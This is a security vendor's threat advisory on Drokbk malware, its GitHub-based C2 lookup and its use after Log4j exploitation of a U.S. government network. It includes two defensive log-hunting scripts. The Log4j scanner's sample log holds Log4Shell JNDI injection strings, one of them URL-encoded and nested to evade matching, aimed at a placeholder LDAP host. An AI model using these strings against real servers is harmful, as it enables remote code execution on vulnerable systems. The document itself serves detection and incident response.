Cobalt Mirage Affiliate Deployed Drokbk Malware


FortiGuard Labs is aware of a report that the "Cluster B" group, an alleged affiliate of the Iranian threat actor "Cobalt Mirage", deployed Drokbk malware to victims' machines. Drokbk uses GitHub to retrieve its Command-and-Control (C2) server location. According to the report, the Cluster B threat actor used Drokbk in an attack against a U.S. government network in early 2022.

Why is this Significant?

This is significant because Drokbk malware was reportedly deployed to a compromised U.S. government network in early 2022. Security vendor Secureworks attributed Drokbk to the "Cluster B" group, an affiliate of the alleged Iranian threat actor "Cobalt Mirage".

What is Drokbk Malware?

Drokbk is a .NET malware whose primary functionality is to execute remote commands served from its Command-and-Control (C2) servers. The malware is designed to retrieve C2 locations from publicly available services such as GitHub.
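The C2-retrieval behaviour described above is the classic "dead-drop resolver" pattern: a process fetches a page from a legitimate public service and shortly afterwards opens a connection to an address the host has never contacted before. The following script, an added example and not code from FortiGuard Labs or Secureworks, shows how a defender can hunt for that sequence in proxy logs. The log format, the field layout, the process names and the watch-list of hosting domains are all assumptions made for illustration; the log lines themselves are constructed.

```python
"""
Added example (not FortiGuard's or Secureworks' code): flag the dead-drop
resolver pattern in proxy logs.  Log format, field names and the watch-list
of hosting domains are assumptions for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed watch-list of public services that can host a C2 pointer.
DEAD_DROP_DOMAINS = {"github.com", "raw.githubusercontent.com", "gist.github.com"}

# Constructed proxy log lines: "<ISO time> <source host> <process> <destination>"
SAMPLE_LOG = """\
2022-02-01T10:00:01 ws-01 chrome.exe www.example.com
2022-02-01T10:00:05 ws-01 chrome.exe raw.githubusercontent.com
2022-02-01T10:00:07 ws-01 chrome.exe www.example.com
2022-02-01T10:05:00 ws-07 svchost.exe raw.githubusercontent.com
2022-02-01T10:05:03 ws-07 svchost.exe 203.0.113.45
2022-02-01T10:20:00 ws-07 svchost.exe 203.0.113.45
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, src, process, dst)."""
    ts, src, proc, dst = line.split()
    return datetime.fromisoformat(ts), src, proc, dst


def find_dead_drop_followups(log_text, window=timedelta(seconds=60)):
    """Return (src, proc, dead_drop_host, new_dest) for every destination that a
    (host, process) pair contacts for the first time within `window` after that
    same pair fetched something from a dead-drop domain.

    Only the first contact with a destination is a candidate, so repeat beacons
    to an already-seen address do not produce duplicate alerts."""
    events = sorted(parse_line(l) for l in log_text.splitlines() if l.strip())
    seen = defaultdict(set)   # (src, proc) -> destinations already observed
    last_drop = {}            # (src, proc) -> (time, domain) of last dead-drop fetch
    hits = []
    for ts, src, proc, dst in events:
        key = (src, proc)
        if dst in DEAD_DROP_DOMAINS:
            last_drop[key] = (ts, dst)
        elif dst not in seen[key] and key in last_drop:
            drop_ts, drop_host = last_drop[key]
            if ts - drop_ts <= window:
                hits.append((src, proc, drop_host, dst))
        seen[key].add(dst)
    return hits


if __name__ == "__main__":
    for src, proc, drop, dest in find_dead_drop_followups(SAMPLE_LOG):
        print(f"{src}: {proc} fetched {drop} then contacted new destination {dest}")
```

In the constructed sample, the browser on ws-01 visits GitHub and then returns to a site it already knew, which is not flagged; svchost.exe on ws-07 fetches from GitHub and three seconds later opens a first-ever connection to an unfamiliar address, which is. The window and the "first-seen" baseline are the two knobs to tune against a real environment's noise.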

According to Secureworks, Drokbk was deployed in early February 2022 to a U.S. government network that had been compromised by leveraging Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45046).
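Because the initial access here was Log4j exploitation, the web-server access logs of the period are where an incident responder would look first. The script below is an added example, not FortiGuard's or Secureworks' code: it scans constructed access log lines for the JNDI lookup string that CVE-2021-44228 and CVE-2021-45046 turn on, after URL-decoding and collapsing the nested lookup forms that hide the literal "${jndi:" from a plain substring search. The log format, the sample addresses (RFC 5737 documentation ranges) and the lines themselves are constructed for illustration.

```python
"""
Added example (not FortiGuard's code): find Log4j JNDI lookup strings in
constructed access log lines, normalising encoded and nested forms first.
"""
import re
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. one with no further braces inside it.
LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")

# Apache "combined" layout: ip ident user [time] "request" status bytes "referer" "user-agent"
ACCESS_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" \S+ \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: one benign line, one lookup in the User-Agent, one
# URL-encoded and nested lookup in the request line.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Feb/2022:09:58:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Feb/2022:09:59:40 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"
10.0.0.9 - - [01/Feb/2022:10:00:02 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 404 208 "-" "curl/7.79.1"
"""


def _resolve(inner):
    """Evaluate the Log4j lookup forms that matter for normalisation."""
    if ":-" in inner:                    # ${name:-default} evaluates to "default"
        return inner.split(":-", 1)[1]
    if inner.startswith("lower:"):       # ${lower:X} -> x
        return inner[6:].lower()
    if inner.startswith("upper:"):       # ${upper:x} -> X
        return inner[6:].upper()
    return "${" + inner + "}"            # keep jndi:, env:, etc. as-is


def normalize(value, max_rounds=10):
    """URL-decode, then collapse nested lookups inside-out until stable."""
    s = unquote(value)
    for _ in range(max_rounds):
        new = LOOKUP_RE.sub(lambda m: _resolve(m.group(1)), s)
        if new == s:
            break
        s = new
    return s.lower()


def has_jndi_lookup(field):
    """True when the normalised field carries a JNDI lookup."""
    return "${jndi:" in normalize(field)


def scan_access_log(log_text):
    """Return (src_ip, field_name) for each line whose request line, referer or
    user-agent contains a JNDI lookup after normalisation."""
    hits = []
    for line in log_text.splitlines():
        m = ACCESS_LINE_RE.match(line)
        if not m:
            continue
        for field in ("req", "ref", "ua"):
            if has_jndi_lookup(m.group(field)):
                hits.append((m.group("ip"), field))
                break
    return hits


if __name__ == "__main__":
    for ip, field in scan_access_log(SAMPLE_LOG):
        print(f"{ip}: JNDI lookup in {field}")
```

A hit only says that a lookup string reached the server; whether it was evaluated depends on the Log4j version and configuration behind that endpoint, which is why the IPS signature listed below and a patched Log4j remain the controls, and the log scan is for scoping after the fact.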

FortiGuard Labs previously released an Outbreak Alert and a Threat Signal for the Log4j vulnerabilities. See the Appendix for links to "Outbreak Alert: Apache Log4j2 Vulnerability" and "Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228)".

What is the Status of Coverage?

FortiGuard Labs detects the samples available from the report with the following AV signatures:

  • MSIL/Agent.3606!tr
  • W64/MaliceyElie.84DB!tr
  • W32/PossibleThreat
  • PossibleThreat

FortiGuard Labs has IPS coverage in place for CVE-2021-44228 and CVE-2021-45046:

  • Apache.Log4j.Error.Log.Remote.Code.Execution

All network IOCs in the report are blocked by Web Filtering.